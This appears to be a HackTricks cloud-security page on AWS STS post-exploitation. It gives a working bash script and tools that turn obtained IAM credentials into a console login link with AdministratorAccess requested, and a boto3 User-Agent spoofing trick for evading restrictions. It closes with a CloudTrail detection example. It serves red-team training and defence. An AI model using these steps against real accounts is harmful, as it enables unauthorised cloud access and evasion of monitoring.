AWS - STS Post Exploitation
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
STS
For more information:
AWS - IAM, Identity Center & SSO Enum
From IAM Creds to Console
If you have managed to obtain some IAM credentials, you might be interested in accessing the web console using the following tools. Note that the user/role must have the sts:GetFederationToken permission.
Custom script
The following script uses the default profile and the default AWS partition (not gov and not cn) to give you a signed URL that you can use to log into the web console:
```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
status=$?
if [ $status -ne 0 ]; then
    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
    exit $status
fi

# Parse the output
session_id=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
session_key=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo "$output" | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
    --get \
    --data-urlencode "Action=getSigninToken" \
    --data-urlencode "SessionDuration=43200" \
    --data-urlencode "Session=$json_creds"
)
# URL-encode the SigninToken so it can be placed in the login query string
signin_token=$(echo -n "$resp" | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)

# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```
aws_consoler
You can generate a web console link using https://github.com/NetSPI/aws_consoler.
```bash
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] # This will generate a link to login into the console
```
warning
Make sure the IAM user has the sts:GetFederationToken permission, or give it a role to assume.
aws-vault
aws-vault is a tool to securely store and access AWS credentials in a development environment.
```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```
note
You can also use aws-vault to obtain a browser console session.
Bypass User-Agent restrictions from Python
If there is a restriction on performing certain actions based on the user agent used (such as blocking use of the python boto3 library based on its user agent), it is possible to use the technique mentioned above to connect to the web console via a browser, or you can directly modify the boto3 user-agent by doing:
```python
# Shared by ex16x41
import boto3

# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change the User-Agent header the client sends for this API call
client.meta.events.register(
    'before-call.secretsmanager.GetSecretValue',
    lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'})
)

# Perform the action
response = client.get_secret_value(SecretId="flag_secret")
print(response['SecretString'])
```
sts:GetFederationToken
With this permission it is possible to create a federated identity for the user executing it, restricted to the permissions that user has.
```bash
aws sts get-federation-token --name <username>
```
The token returned by sts:GetFederationToken represents a federated identity of the calling user, but with reduced permissions. Even if the user has administrator rights, some actions such as listing IAM users or attaching policies cannot be performed through the federated token.
Moreover, this method is somewhat stealthier, since the federated user does not appear in the AWS Portal; it can only be seen through CloudTrail logs or monitoring tools.
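Since CloudTrail is the only place the federated user shows up, and the userAgent field CloudTrail records is simply whatever header the client sent (which is why the boto3 trick above works), the detection side looks like the following. This is an added example, not code from the original page; the records are constructed, their field names follow the CloudTrail event schema as an assumption, and the function and alert keys are hypothetical names.

```python
# Constructed sample CloudTrail records (not real telemetry), shaped after the
# CloudTrail event schema as an assumption: IAM user "alice" calls
# GetFederationToken, the resulting federated session lists S3 buckets, and an
# unrelated IAM user "bob" lists buckets with the stock boto3 client.
SAMPLE_EVENTS = [
    {"eventSource": "sts.amazonaws.com", "eventName": "GetFederationToken",
     "userIdentity": {"type": "IAMUser", "userName": "alice",
                      "arn": "arn:aws:iam::111122223333:user/alice"},
     "requestParameters": {"name": "consoler", "durationSeconds": 43200,
                           "policyArns": [{"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}]},
     "userAgent": "aws-cli/2.15.0"},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
     "userIdentity": {"type": "FederatedUser",
                      "arn": "arn:aws:sts::111122223333:federated-user/consoler"},
     "userAgent": "my-custom-tool"},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
     "userIdentity": {"type": "IAMUser", "userName": "bob",
                      "arn": "arn:aws:iam::111122223333:user/bob"},
     "userAgent": "Boto3/1.34.0"},
]


def find_federation_activity(events):
    """Return one alert dict per GetFederationToken call or federated-user action."""
    alerts = []
    for ev in events:
        ident = ev.get("userIdentity") or {}
        is_sts = ev.get("eventSource") == "sts.amazonaws.com"
        if is_sts and ev.get("eventName") == "GetFederationToken":
            params = ev.get("requestParameters") or {}
            alerts.append({"kind": "GetFederationToken", "caller": ident.get("arn"),
                           "federated_name": params.get("name"),
                           "policies": [p.get("arn") for p in params.get("policyArns", [])]})
        elif ident.get("type") == "FederatedUser":
            # The federated user is invisible in the IAM console, so CloudTrail is
            # the only place its actions show. userAgent is the raw header the
            # client sent and is trivially changed, so it is kept for context only
            # and never used as the match key.
            alerts.append({"kind": "FederatedUserActivity", "principal": ident.get("arn"),
                           "action": f'{ev.get("eventSource")}:{ev.get("eventName")}',
                           "user_agent": ev.get("userAgent")})
    return alerts


if __name__ == "__main__":
    for alert in find_federation_activity(SAMPLE_EVENTS):
        print(alert)
```

Matching on userIdentity.type and the STS event name rather than on userAgent is the point: the user-agent value is under the caller's control, the principal type and API name are not.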